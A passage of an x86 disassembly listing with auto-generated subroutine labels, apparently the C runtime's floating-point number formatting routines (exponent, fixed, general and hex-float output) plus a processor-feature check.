		add	esp, 0Ch

loc_410F5D:				; CODE XREF: sub_410E04+143j
					; sub_410E04+148j
		cmp	[ebp+var_4], 0
		jz	short loc_410F6A
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_410F6A:				; CODE XREF: sub_410E04+15Dj
		xor	eax, eax

loc_410F6C:				; CODE XREF: sub_410E04+42j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_410E04	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_410F71	proc near		; CODE XREF: sub_41103F+14p
					; sub_411674+7Cp

var_2C		= dword	ptr -2Ch
var_1C		= byte ptr -1Ch
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 2Ch
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		push	edi
		mov	edi, [ebp+arg_4]
		push	16h
		pop	esi
		push	esi
		lea	ecx, [ebp+var_1C]
		push	ecx
		lea	ecx, [ebp+var_2C]
		push	ecx
		push	dword ptr [eax+4]
		push	dword ptr [eax]
		call	sub_411B21
		xor	ebx, ebx
		add	esp, 14h
		cmp	edi, ebx
		jnz	short loc_410FC1

loc_410FA9:				; CODE XREF: sub_410F71+55j
		call	sub_405B83
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	[eax], esi
		call	sub_4032F9
		add	esp, 14h
		mov	eax, esi
		jmp	short loc_411030
; ---------------------------------------------------------------------------

loc_410FC1:				; CODE XREF: sub_410F71+36j
		mov	eax, [ebp+arg_8]
		cmp	eax, ebx
		jbe	short loc_410FA9
		cmp	eax, 0FFFFFFFFh
		mov	esi, [ebp+arg_C]
		jnz	short loc_410FD5
		or	eax, 0FFFFFFFFh
		jmp	short loc_410FE9
; ---------------------------------------------------------------------------

loc_410FD5:				; CODE XREF: sub_410F71+5Dj
		xor	ecx, ecx
		cmp	[ebp+var_2C], 2Dh
		setz	cl
		sub	eax, ecx
		xor	ecx, ecx
		cmp	esi, ebx
		setnle	cl
		sub	eax, ecx

loc_410FE9:				; CODE XREF: sub_410F71+62j
		lea	ecx, [ebp+var_2C]
		push	ecx
		lea	ecx, [esi+1]
		push	ecx
		push	eax
		xor	eax, eax
		cmp	[ebp+var_2C], 2Dh
		setz	al
		xor	ecx, ecx
		cmp	esi, ebx
		setnle	cl
		add	eax, edi
		add	ecx, eax
		push	ecx
		call	sub_4119A9
		add	esp, 10h
		cmp	eax, ebx
		jz	short loc_411017
		mov	[edi], bl
		jmp	short loc_411030
; ---------------------------------------------------------------------------

loc_411017:				; CODE XREF: sub_410F71+A0j
		push	[ebp+arg_14]
		lea	eax, [ebp+var_2C]
		push	ebx
		push	eax
		push	[ebp+arg_10]
		mov	eax, edi
		push	esi
		push	[ebp+arg_8]
		call	sub_410E04
		add	esp, 18h

loc_411030:				; CODE XREF: sub_410F71+4Ej
					; sub_410F71+A4j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		leave
		retn
sub_410F71	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41103F	proc near		; CODE XREF: sub_41105D+BDp

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		push	0
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_410F71
		add	esp, 18h
		pop	ebp
		retn
sub_41103F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41105D	proc near		; CODE XREF: sub_411674+63p

var_24		= dword	ptr -24h
var_1C		= dword	ptr -1Ch
var_18		= byte ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 24h
		push	esi
		push	edi
		push	[ebp+arg_14]
		lea	ecx, [ebp+var_24]
		mov	[ebp+var_14], 3FFh
		xor	edi, edi
		mov	[ebp+var_4], 30h
		call	sub_402ADF
		cmp	[ebp+arg_C], edi
		jge	short loc_411088
		mov	[ebp+arg_C], edi

loc_411088:				; CODE XREF: sub_41105D+26j
		mov	esi, [ebp+arg_4]
		cmp	esi, edi
		jnz	short loc_4110BA

loc_41108F:				; CODE XREF: sub_41105D+60j
		call	sub_405B83
		push	16h

loc_411096:				; CODE XREF: sub_41105D+77j
		pop	esi
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		mov	[eax], esi
		call	sub_4032F9
		add	esp, 14h
		cmp	[ebp+var_18], 0
		jz	short loc_4110B3
		mov	eax, [ebp+var_1C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_4110B3:				; CODE XREF: sub_41105D+4Dj
		mov	eax, esi
		jmp	loc_4113CA
; ---------------------------------------------------------------------------

loc_4110BA:				; CODE XREF: sub_41105D+30j
		cmp	[ebp+arg_8], edi
		jbe	short loc_41108F
		mov	eax, [ebp+arg_C]
		add	eax, 0Bh
		cmp	[ebp+arg_8], eax
		mov	byte ptr [esi],	0
		ja	short loc_4110D6
		call	sub_405B83
		push	22h
		jmp	short loc_411096
; ---------------------------------------------------------------------------

loc_4110D6:				; CODE XREF: sub_41105D+6Ej
		mov	edi, [ebp+arg_0]
		mov	eax, [edi]
		mov	[ebp+var_C], eax
		mov	eax, [edi+4]
		mov	ecx, eax
		shr	ecx, 14h
		mov	edx, 7FFh
		push	ebx
		and	ecx, edx
		xor	ebx, ebx
		cmp	ecx, edx
		jnz	loc_411188
		test	ebx, ebx
		jnz	loc_411188
		mov	eax, [ebp+arg_8]
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_41110C
		or	eax, eax
		jmp	short loc_41110F
; ---------------------------------------------------------------------------

loc_41110C:				; CODE XREF: sub_41105D+A9j
		add	eax, 0FFFFFFFEh

loc_41110F:				; CODE XREF: sub_41105D+ADj
		push	0
		push	[ebp+arg_C]
		lea	ebx, [esi+2]
		push	eax
		push	ebx
		push	edi
		call	sub_41103F
		add	esp, 14h
		test	eax, eax
		jz	short loc_41113F
		cmp	[ebp+var_18], 0
		mov	byte ptr [esi],	0
		jz	loc_4113C9
		mov	ecx, [ebp+var_1C]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	loc_4113C9
; ---------------------------------------------------------------------------

loc_41113F:				; CODE XREF: sub_41105D+C7j
		cmp	byte ptr [ebx],	2Dh
		jnz	short loc_411148
		mov	byte ptr [esi],	2Dh
		inc	esi

loc_411148:				; CODE XREF: sub_41105D+E5j
		mov	byte ptr [esi],	30h
		inc	esi
		cmp	[ebp+arg_10], 0
		push	65h
		setz	al
		dec	al
		and	al, 0E0h
		add	al, 78h
		mov	[esi], al
		inc	esi
		push	esi
		call	sub_411830
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	loc_4113BA
		cmp	[ebp+arg_10], 0
		setz	cl
		dec	cl
		and	cl, 0E0h
		add	cl, 70h
		mov	[eax], cl
		mov	byte ptr [eax+3], 0
		jmp	loc_4113BA
; ---------------------------------------------------------------------------

loc_411188:				; CODE XREF: sub_41105D+95j
					; sub_41105D+9Dj
		and	eax, 80000000h
		xor	ecx, ecx
		or	ecx, eax
		jz	short loc_411197
		mov	byte ptr [esi],	2Dh
		inc	esi

loc_411197:				; CODE XREF: sub_41105D+134j
		mov	ebx, [ebp+arg_10]
		mov	byte ptr [esi],	30h
		inc	esi
		test	ebx, ebx
		setz	al
		dec	al
		and	al, 0E0h
		add	al, 78h
		mov	[esi], al
		mov	ecx, [edi+4]
		inc	esi
		neg	ebx
		sbb	ebx, ebx
		and	ebx, 0FFFFFFE0h
		and	ecx, 7FF00000h
		xor	eax, eax
		add	ebx, 27h
		xor	edx, edx
		or	eax, ecx
		jnz	short loc_4111E8
		mov	byte ptr [esi],	30h
		mov	ecx, [edi+4]
		mov	eax, [edi]
		and	ecx, 0FFFFFh
		inc	esi
		or	eax, ecx
		jnz	short loc_4111DF
		mov	[ebp+var_14], edx
		jmp	short loc_4111EC
; ---------------------------------------------------------------------------

loc_4111DF:				; CODE XREF: sub_41105D+17Bj
		mov	[ebp+var_14], 3FEh
		jmp	short loc_4111EC
; ---------------------------------------------------------------------------

loc_4111E8:				; CODE XREF: sub_41105D+168j
		mov	byte ptr [esi],	31h
		inc	esi

loc_4111EC:				; CODE XREF: sub_41105D+180j
					; sub_41105D+189j
		mov	eax, esi
		inc	esi
		cmp	[ebp+arg_C], edx
		mov	[ebp+arg_4], eax
		jnz	short loc_4111FB
		mov	[eax], dl
		jmp	short loc_41120A
; ---------------------------------------------------------------------------

loc_4111FB:				; CODE XREF: sub_41105D+198j
		mov	ecx, [ebp+var_24]
		mov	ecx, [ecx+0BCh]
		mov	ecx, [ecx]
		mov	cl, [ecx]
		mov	[eax], cl

loc_41120A:				; CODE XREF: sub_41105D+19Cj
		mov	ecx, [edi+4]
		mov	eax, [edi]
		and	ecx, 0FFFFFh
		mov	[ebp+var_8], ecx
		ja	short loc_411222
		cmp	eax, edx
		jbe	loc_4112D7

loc_411222:				; CODE XREF: sub_41105D+1BBj
		mov	[ebp+var_C], edx
		mov	[ebp+var_8], 0F0000h

loc_41122C:				; CODE XREF: sub_41105D+220j
		cmp	[ebp+arg_C], 0
		jle	short loc_41127F
		mov	edx, [edi+4]
		and	edx, [ebp+var_8]
		mov	eax, [edi]
		movsx	ecx, word ptr [ebp+var_4]
		and	eax, [ebp+var_C]
		and	edx, 0FFFFFh
		call	sub_411C90
		add	ax, 30h
		movzx	eax, ax
		cmp	ax, 39h
		jbe	short loc_41125B
		add	eax, ebx

loc_41125B:				; CODE XREF: sub_41105D+1FAj
		mov	ecx, [ebp+var_8]
		sub	[ebp+var_4], 4
		mov	[esi], al
		mov	eax, [ebp+var_C]
		shrd	eax, ecx, 4
		shr	ecx, 4
		inc	esi
		dec	[ebp+arg_C]
		cmp	word ptr [ebp+var_4], 0
		mov	[ebp+var_C], eax
		mov	[ebp+var_8], ecx
		jge	short loc_41122C

loc_41127F:				; CODE XREF: sub_41105D+1D3j
		cmp	word ptr [ebp+var_4], 0
		jl	short loc_4112D7
		mov	edx, [edi+4]
		and	edx, [ebp+var_8]
		mov	eax, [edi]
		movsx	ecx, word ptr [ebp+var_4]
		and	eax, [ebp+var_C]
		and	edx, 0FFFFFh
		call	sub_411C90
		cmp	ax, 8
		jbe	short loc_4112D7
		lea	eax, [esi-1]

loc_4112A9:				; CODE XREF: sub_41105D+25Cj
		mov	cl, [eax]
		cmp	cl, 66h
		jz	short loc_4112B5
		cmp	cl, 46h
		jnz	short loc_4112BB

loc_4112B5:				; CODE XREF: sub_41105D+251j
		mov	byte ptr [eax],	30h
		dec	eax
		jmp	short loc_4112A9
; ---------------------------------------------------------------------------

loc_4112BB:				; CODE XREF: sub_41105D+256j
		cmp	eax, [ebp+arg_4]
		jz	short loc_4112D4
		mov	cl, [eax]
		cmp	cl, 39h
		jnz	short loc_4112CE
		add	bl, 3Ah
		mov	[eax], bl
		jmp	short loc_4112D7
; ---------------------------------------------------------------------------

loc_4112CE:				; CODE XREF: sub_41105D+268j
		inc	cl
		mov	[eax], cl
		jmp	short loc_4112D7
; ---------------------------------------------------------------------------

loc_4112D4:				; CODE XREF: sub_41105D+261j
		inc	byte ptr [eax-1]

loc_4112D7:				; CODE XREF: sub_41105D+1BFj
					; sub_41105D+227j ...
		cmp	[ebp+arg_C], 0
		jle	short loc_4112EE
		push	[ebp+arg_C]
		push	30h
		push	esi
		call	sub_407F20
		add	esp, 0Ch
		add	esi, [ebp+arg_C]

loc_4112EE:				; CODE XREF: sub_41105D+27Ej
		mov	eax, [ebp+arg_4]
		cmp	byte ptr [eax],	0
		jnz	short loc_4112F8
		mov	esi, eax

loc_4112F8:				; CODE XREF: sub_41105D+297j
		cmp	[ebp+arg_10], 0
		mov	cl, 34h
		setz	al
		dec	al
		and	al, 0E0h
		add	al, 70h
		mov	[esi], al
		mov	eax, [edi]
		mov	edx, [edi+4]
		inc	esi
		call	sub_411C90
		xor	ebx, ebx
		and	eax, 7FFh
		and	edx, ebx
		sub	eax, [ebp+var_14]
		push	ebx
		pop	ecx
		sbb	edx, ecx
		js	short loc_411332
		jg	short loc_41132C
		cmp	eax, ebx
		jb	short loc_411332

loc_41132C:				; CODE XREF: sub_41105D+2C9j
		mov	byte ptr [esi],	2Bh
		inc	esi
		jmp	short loc_41133C
; ---------------------------------------------------------------------------

loc_411332:				; CODE XREF: sub_41105D+2C7j
					; sub_41105D+2CDj
		mov	byte ptr [esi],	2Dh
		inc	esi
		neg	eax
		adc	edx, ebx
		neg	edx

loc_41133C:				; CODE XREF: sub_41105D+2D3j
		cmp	edx, ebx
		mov	edi, esi
		mov	byte ptr [esi],	30h
		jl	short loc_411369
		mov	ecx, 3E8h
		jg	short loc_411350
		cmp	eax, ecx
		jb	short loc_411369

loc_411350:				; CODE XREF: sub_41105D+2EDj
		push	ebx
		push	ecx
		push	edx
		push	eax
		call	sub_411BB0
		add	al, 30h
		mov	[esi], al
		inc	esi
		cmp	esi, edi
		mov	[ebp+var_10], edx
		mov	eax, ecx
		mov	edx, ebx
		jnz	short loc_411374

loc_411369:				; CODE XREF: sub_41105D+2E6j
					; sub_41105D+2F1j
		test	edx, edx
		jl	short loc_41138B
		jg	short loc_411374
		cmp	eax, 64h
		jb	short loc_41138B

loc_411374:				; CODE XREF: sub_41105D+30Aj
					; sub_41105D+310j
		push	0
		push	64h
		push	edx
		push	eax
		call	sub_411BB0
		add	al, 30h
		mov	[esi], al
		mov	[ebp+var_10], edx
		inc	esi
		mov	eax, ecx
		mov	edx, ebx

loc_41138B:				; CODE XREF: sub_41105D+30Ej
					; sub_41105D+315j
		cmp	esi, edi
		jnz	short loc_41139A
		test	edx, edx
		jl	short loc_4113B2
		jg	short loc_41139A
		cmp	eax, 0Ah
		jb	short loc_4113B2

loc_41139A:				; CODE XREF: sub_41105D+330j
					; sub_41105D+336j
		push	0
		push	0Ah
		push	edx
		push	eax
		call	sub_411BB0
		add	al, 30h
		mov	[esi], al
		mov	[ebp+var_10], edx
		inc	esi
		mov	eax, ecx
		mov	[ebp+var_10], ebx

loc_4113B2:				; CODE XREF: sub_41105D+334j
					; sub_41105D+33Bj
		add	al, 30h
		mov	[esi], al
		mov	byte ptr [esi+1], 0

loc_4113BA:				; CODE XREF: sub_41105D+10Bj
					; sub_41105D+126j
		cmp	[ebp+var_18], 0
		jz	short loc_4113C7
		mov	eax, [ebp+var_1C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_4113C7:				; CODE XREF: sub_41105D+361j
		xor	eax, eax

loc_4113C9:				; CODE XREF: sub_41105D+D0j
					; sub_41105D+DDj
		pop	ebx

loc_4113CA:				; CODE XREF: sub_41105D+58j
		pop	edi
		pop	esi
		leave
		retn
sub_41105D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4113CE	proc near		; CODE XREF: sub_4114C3+A2p
					; sub_41157C+C3p

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= byte ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		push	esi
		push	edi
		push	[ebp+arg_C]
		mov	ebx, eax
		mov	esi, [ebx+4]
		mov	edi, ecx
		lea	ecx, [ebp+var_10]
		dec	esi
		call	sub_402ADF
		test	edi, edi
		jnz	short loc_41141B

loc_4113EE:				; CODE XREF: sub_4113CE+51j
		call	sub_405B83
		push	16h
		pop	esi
		mov	[eax], esi
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		call	sub_4032F9
		add	esp, 14h
		cmp	[ebp+var_4], 0
		jz	short loc_411414
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_411414:				; CODE XREF: sub_4113CE+3Dj
		mov	eax, esi
		jmp	loc_4114BE
; ---------------------------------------------------------------------------

loc_41141B:				; CODE XREF: sub_4113CE+1Ej
		cmp	[ebp+arg_0], 0
		jbe	short loc_4113EE
		cmp	[ebp+arg_8], 0
		jz	short loc_41143F
		cmp	esi, [ebp+arg_4]
		jnz	short loc_41143F
		xor	eax, eax
		cmp	dword ptr [ebx], 2Dh
		setz	al
		add	eax, esi
		add	eax, edi
		mov	byte ptr [eax],	30h
		mov	byte ptr [eax+1], 0

loc_41143F:				; CODE XREF: sub_4113CE+57j
					; sub_4113CE+5Cj
		cmp	dword ptr [ebx], 2Dh
		mov	esi, edi
		jnz	short loc_41144C
		mov	byte ptr [edi],	2Dh
		lea	esi, [edi+1]

loc_41144C:				; CODE XREF: sub_4113CE+76j
		mov	eax, [ebx+4]
		xor	edi, edi
		inc	edi
		test	eax, eax
		jg	short loc_411463
		mov	eax, esi
		call	sub_410DCB
		mov	byte ptr [esi],	30h
		inc	esi
		jmp	short loc_411465
; ---------------------------------------------------------------------------

loc_411463:				; CODE XREF: sub_4113CE+86j
		add	esi, eax

loc_411465:				; CODE XREF: sub_4113CE+93j
		cmp	[ebp+arg_4], 0
		jle	short loc_4114AF
		mov	eax, esi
		call	sub_410DCB
		mov	eax, [ebp+var_10]
		mov	eax, [eax+0BCh]
		mov	eax, [eax]
		mov	al, [eax]
		mov	[esi], al
		mov	ebx, [ebx+4]
		inc	esi
		test	ebx, ebx
		jge	short loc_4114AF
		neg	ebx
		cmp	[ebp+arg_8], 0
		jnz	short loc_411496
		cmp	[ebp+arg_4], ebx
		jl	short loc_411499

loc_411496:				; CODE XREF: sub_4113CE+C1j
		mov	[ebp+arg_4], ebx

loc_411499:				; CODE XREF: sub_4113CE+C6j
		mov	edi, [ebp+arg_4]
		mov	eax, esi
		call	sub_410DCB
		push	edi
		push	30h
		push	esi
		call	sub_407F20
		add	esp, 0Ch

loc_4114AF:				; CODE XREF: sub_4113CE+9Bj
					; sub_4113CE+B9j
		cmp	[ebp+var_4], 0
		jz	short loc_4114BC
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_4114BC:				; CODE XREF: sub_4113CE+E5j
		xor	eax, eax

loc_4114BE:				; CODE XREF: sub_4113CE+48j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_4113CE	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4114C3	proc near		; CODE XREF: sub_411674+24p

var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_1C		= byte ptr -1Ch
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 2Ch
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		push	edi
		mov	edi, [ebp+arg_4]
		push	16h
		pop	esi
		push	esi
		lea	ecx, [ebp+var_1C]
		push	ecx
		lea	ecx, [ebp+var_2C]
		push	ecx
		push	dword ptr [eax+4]
		push	dword ptr [eax]
		call	sub_411B21
		xor	ebx, ebx
		add	esp, 14h
		cmp	edi, ebx
		jnz	short loc_411513

loc_4114FB:				; CODE XREF: sub_4114C3+55j
		call	sub_405B83
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	[eax], esi
		call	sub_4032F9
		add	esp, 14h
		mov	eax, esi
		jmp	short loc_41156D
; ---------------------------------------------------------------------------

loc_411513:				; CODE XREF: sub_4114C3+36j
		mov	eax, [ebp+arg_8]
		cmp	eax, ebx
		jbe	short loc_4114FB
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_411523
		or	eax, eax
		jmp	short loc_41152E
; ---------------------------------------------------------------------------

loc_411523:				; CODE XREF: sub_4114C3+5Aj
		xor	ecx, ecx
		cmp	[ebp+var_2C], 2Dh
		setz	cl
		sub	eax, ecx

loc_41152E:				; CODE XREF: sub_4114C3+5Ej
		mov	esi, [ebp+arg_C]
		lea	ecx, [ebp+var_2C]
		push	ecx
		mov	ecx, [ebp+var_28]
		add	ecx, esi
		push	ecx
		push	eax
		xor	eax, eax
		cmp	[ebp+var_2C], 2Dh
		setz	al
		add	eax, edi
		push	eax
		call	sub_4119A9
		add	esp, 10h
		cmp	eax, ebx
		jz	short loc_411558
		mov	[edi], bl
		jmp	short loc_41156D
; ---------------------------------------------------------------------------

loc_411558:				; CODE XREF: sub_4114C3+8Fj
		push	[ebp+arg_10]
		lea	eax, [ebp+var_2C]
		push	ebx
		push	esi
		push	[ebp+arg_8]
		mov	ecx, edi
		call	sub_4113CE
		add	esp, 10h

loc_41156D:				; CODE XREF: sub_4114C3+4Ej
					; sub_4114C3+93j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		leave
		retn
sub_4114C3	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41157C	proc near		; CODE XREF: sub_411674+4Ap

var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_20		= dword	ptr -20h
var_1C		= byte ptr -1Ch
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 30h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		mov	esi, [ebp+arg_4]
		push	edi
		push	16h
		pop	edi
		push	edi
		lea	ecx, [ebp+var_1C]
		push	ecx
		lea	ecx, [ebp+var_30]
		push	ecx
		push	dword ptr [eax+4]
		push	dword ptr [eax]
		call	sub_411B21
		xor	ebx, ebx
		add	esp, 14h
		cmp	esi, ebx
		jnz	short loc_4115CF

loc_4115B4:				; CODE XREF: sub_41157C+58j
		call	sub_405B83
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	[eax], edi
		call	sub_4032F9
		add	esp, 14h
		mov	eax, edi
		jmp	loc_411665
; ---------------------------------------------------------------------------

loc_4115CF:				; CODE XREF: sub_41157C+36j
		mov	ecx, [ebp+arg_8]
		cmp	ecx, ebx
		jbe	short loc_4115B4
		mov	eax, [ebp+var_2C]
		dec	eax
		mov	[ebp+var_20], eax
		xor	eax, eax
		cmp	[ebp+var_30], 2Dh
		setz	al
		cmp	ecx, 0FFFFFFFFh
		lea	edi, [eax+esi]
		jnz	short loc_4115F2
		or	ecx, ecx
		jmp	short loc_4115F4
; ---------------------------------------------------------------------------

loc_4115F2:				; CODE XREF: sub_41157C+70j
		sub	ecx, eax

loc_4115F4:				; CODE XREF: sub_41157C+74j
		lea	eax, [ebp+var_30]
		push	eax
		push	[ebp+arg_C]
		push	ecx
		push	edi
		call	sub_4119A9
		add	esp, 10h
		cmp	eax, ebx
		jz	short loc_41160D
		mov	[esi], bl
		jmp	short loc_411665
; ---------------------------------------------------------------------------

loc_41160D:				; CODE XREF: sub_41157C+8Bj
		mov	eax, [ebp+var_2C]
		dec	eax
		cmp	[ebp+var_20], eax
		setl	cl
		cmp	eax, 0FFFFFFFCh
		jl	short loc_411649
		cmp	eax, [ebp+arg_C]
		jge	short loc_411649
		cmp	cl, bl
		jz	short loc_41162F

loc_411625:				; CODE XREF: sub_41157C+AEj
		mov	al, [edi]
		inc	edi
		test	al, al
		jnz	short loc_411625
		mov	[edi-2], bl

loc_41162F:				; CODE XREF: sub_41157C+A7j
		push	[ebp+arg_14]
		lea	eax, [ebp+var_30]
		push	1
		push	[ebp+arg_C]
		mov	ecx, esi
		push	[ebp+arg_8]
		call	sub_4113CE
		add	esp, 10h
		jmp	short loc_411665
; ---------------------------------------------------------------------------

loc_411649:				; CODE XREF: sub_41157C+9Ej
					; sub_41157C+A3j
		push	[ebp+arg_14]
		lea	eax, [ebp+var_30]
		push	1
		push	eax
		push	[ebp+arg_10]
		mov	eax, esi
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		call	sub_410E04
		add	esp, 18h

loc_411665:				; CODE XREF: sub_41157C+4Ej
					; sub_41157C+8Fj ...
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		leave
		retn
sub_41157C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411674	proc near		; CODE XREF: sub_4116FA+17p
					; DATA XREF: sub_40FABC+37o ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_C]
		cmp	eax, 65h
		jz	short loc_4116DE
		cmp	eax, 45h
		jz	short loc_4116DE
		cmp	eax, 66h
		jnz	short loc_4116A2
		push	[ebp+arg_18]
		push	[ebp+arg_10]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_4114C3
		add	esp, 14h
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_4116A2:				; CODE XREF: sub_411674+13j
		cmp	eax, 61h
		jz	short loc_4116C5
		cmp	eax, 41h
		jz	short loc_4116C5
		push	[ebp+arg_18]
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_41157C
		jmp	short loc_4116F5
; ---------------------------------------------------------------------------

loc_4116C5:				; CODE XREF: sub_411674+31j
					; sub_411674+36j
		push	[ebp+arg_18]
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_41105D
		jmp	short loc_4116F5
; ---------------------------------------------------------------------------

loc_4116DE:				; CODE XREF: sub_411674+9j
					; sub_411674+Ej
		push	[ebp+arg_18]
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_410F71

loc_4116F5:				; CODE XREF: sub_411674+4Fj
					; sub_411674+68j
		add	esp, 18h
		pop	ebp
		retn
sub_411674	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4116FA	proc near		; DATA XREF: sub_40FABCo
					; .data:off_423F80o ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		push	0
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_411674
		add	esp, 1Ch
		pop	ebp
		retn
sub_4116FA	endp


; =============== S U B	R O U T	I N E =======================================



sub_41171B	proc near		; CODE XREF: sub_40FB1C+16p
		push	esi
		push	30000h
		push	10000h
		xor	esi, esi
		push	esi
		call	sub_411CAF
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_411742
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4031FD
		add	esp, 14h

loc_411742:				; CODE XREF: sub_41171B+18j
		pop	esi
		retn
sub_41171B	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411744	proc near		; CODE XREF: sub_411780:loc_4117A4j

var_18		= qword	ptr -18h
var_10		= qword	ptr -10h
var_8		= qword	ptr -8

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		fld	ds:dbl_41EE80
		fstp	[ebp+var_10]
		fld	ds:dbl_41EE78
		fstp	[ebp+var_18]
		fld	[ebp+var_18]
		fdiv	[ebp+var_10]
		fmul	[ebp+var_10]
		fsubr	[ebp+var_18]
		fstp	[ebp+var_8]
		fld1
		fcomp	[ebp+var_8]
		fnstsw	ax
		test	ah, 5
		jp	short loc_41177C
		xor	eax, eax
		inc	eax
		leave
		retn
; ---------------------------------------------------------------------------

loc_41177C:				; CODE XREF: sub_411744+31j
		xor	eax, eax
		leave
		retn
sub_411744	endp


; =============== S U B	R O U T	I N E =======================================



sub_411780	proc near		; CODE XREF: sub_40FB1C+5p
		push	offset aKernel32 ; "KERNEL32"
		call	ds:dword_41D0E0	; GetModuleHandleA
		test	eax, eax
		jz	short loc_4117A4
		push	offset aIsprocessorfea ; "IsProcessorFeaturePresent"
		push	eax
		call	ds:off_41D0E8
		test	eax, eax
		jz	short loc_4117A4
		push	0
		call	eax
		retn
; ---------------------------------------------------------------------------

loc_4117A4:				; CODE XREF: sub_411780+Dj
					; sub_411780+1Dj
		jmp	sub_411744
sub_411780	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



